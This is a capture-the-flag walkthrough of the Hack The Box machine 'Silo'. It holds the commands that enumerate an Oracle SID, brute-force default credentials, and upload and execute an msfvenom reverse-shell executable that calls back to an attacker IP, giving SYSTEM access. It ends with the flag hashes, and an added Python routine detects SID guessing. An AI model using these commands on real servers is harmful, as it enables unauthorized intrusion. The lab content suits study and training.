Windows Boxes

silo

  1. nmap
  2. Oracle Database Attack Tool
    1. SID Guesser
    2. oracle default account wordlist
    3. odat passwordguesser
    4. odat upload
      1. odat utlfile -h
      2. msfvenom
      3. utlfile
    5. odat externaltable
  3. user/root
  4. lessons learned

silo

images/689-1.png
images/689-2.png

nmap

nmap -sV -sC -oA nmap/silo 10.10.10.82
images/690-1.png


images/690-2.png
images/690-3.png

Oracle Database Attack Tool

Since this box is running an Oracle database, let's apt-get install ODAT.
images/691-1.png
images/691-2.png

Commands here:
images/691-3.png

SID Guesser

The first thing we need to enumerate is the Oracle System ID (SID) string. This is a string that is used to uniquely identify a particular database on a system. This can be done using the sidguesser module in ODAT.

odat sidguesser -s 10.10.10.82 -p 1521
images/692-1.png
images/692-2.png
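
Seen from the defending side, SID guessing like this leaves a burst of TNS-12505 rejections from a single source in the listener log. The detection routine below is an added example, not part of the original notes; the log lines are constructed in the classic text listener.log layout, and the function names, addresses and threshold are hypothetical.

```python
import re
from collections import defaultdict

# One listener.log connection entry: CONNECT_DATA * ADDRESS * establish * SID * code.
# Entries that use SERVICE_NAME instead of SID do not match and are ignored.
ENTRY = re.compile(
    r"\(CONNECT_DATA=.*?\(SID=(?P<sid>[^)]+)\).*?"
    r"\(ADDRESS=.*?\(HOST=(?P<src>[^)]+)\).*?"
    r"\* establish \* \S+ \* (?P<code>\d+)\s*$"
)
UNKNOWN_SID = "12505"  # TNS-12505: listener does not know the SID given


def find_sid_guessing(lines, min_distinct=5):
    """Map each source address to the unknown SIDs it tried, keeping only
    sources rejected for at least min_distinct different SIDs."""
    rejected = defaultdict(set)
    for line in lines:
        m = ENTRY.search(line)
        if m and m["code"] == UNKNOWN_SID:
            rejected[m["src"]].add(m["sid"].upper())
    return {src: sorted(sids) for src, sids in rejected.items()
            if len(sids) >= min_distinct}


def _entry(sec, sid, src, code):
    """Build one constructed log line (not taken from a real system)."""
    return (f"09-JAN-2024 10:15:{sec:02d} * (CONNECT_DATA=(SID={sid})"
            f"(CID=(PROGRAM=)(HOST=client)(USER=))) * (ADDRESS=(PROTOCOL=tcp)"
            f"(HOST={src})(PORT=4{sec:04d})) * establish * {sid} * {code}")


# Constructed sample: an application server, one mistyped SID, and a scanner.
SAMPLE_LOG = [
    _entry(1, "XE", "10.0.0.5", 0),
    _entry(2, "XEE", "10.0.0.7", 12505),
    *[_entry(10 + i, sid, "192.0.2.10", 12505)
      for i, sid in enumerate(["ORCL", "PROD", "TEST", "DEV", "UAT", "orcl"])],
    _entry(20, "XE", "192.0.2.10", 0),
    _entry(21, "XE", "10.0.0.5", 0),
]

if __name__ == "__main__":
    for src, sids in find_sid_guessing(SAMPLE_LOG).items():
        print(f"possible SID guessing from {src}: {len(sids)} unknown SIDs {sids}")
```

A single mistyped SID stays below the threshold, so only the source cycling through many unknown SIDs is reported.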

oracle default account wordlist

There is a special user wordlist stored within the metasploit-framework that is perfect for enumerating potential Oracle database users. It is located at
/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
Let's copy it over to our working directory.
images/694-1.png

The usernames and passwords in this list are separated by a space instead of a forward slash (/). We'll have to change the separator to a forward slash so that the ODAT tool is able to parse the file. This can be done in vi using the following command.

images/694-2.png
:%s/ /\//g
images/694-3.png
images/694-4.png


Now that we have a proper list, we can use the passwordguesser module to brute force credentials.

odat passwordguesser

odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /root/Documents/htb/boxes/silo/ocacle_default_userpass.txt
images/695-1.png



scott/tiger worked!
images/695-2.png

odat upload

ODAT has a utlfile module that allows you to upload, download or delete a file. Since we are trying to get code execution on the box, let's upload a malicious executable that sends a reverse shell back to our attack machine.
images/697-1.png

odat utlfile -h

images/698-1.png

msfvenom

First, generate the executable using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.62 LPORT=1234 -f exe > shell.exe
images/693-1.png

utlfile

Next, upload the file using the utlfile module to put our shell.exe reverse shell payload onto the server.

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp shell.exe /root/Documents/htb/boxes/silo/shell.exe

We get the following error.
images/696-1.png

We don’t have sufficient privileges to upload a file. Let’s see if the user was given sysdba privileges by adding the --sysdba flag to our command.

odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp shell.exe /root/Documents/htb/boxes/silo/shell.exe --sysdba
images/696-2.png
Our upload was successful and, according to odat's output, the file was stored in the /temp directory on the 10.10.10.82 server. However, the /temp directory is not reachable on our webserver, and dirbuster would take a while busting where the /temp directory

Luckily, odat has a module called externaltable that allows us to execute our .exe payload from its command line.


odat externaltable

odat externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba

images/699-1.png

Check back on our listener and we have connected to the box as system! No need to priv esc.
images/699-2.png

user/root

images/701-1.png
92ede778a1cc8d27cb6623055c331617

images/701-2.png
cd39ea0af657a495e33bc59c7836faf6

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/440-1.png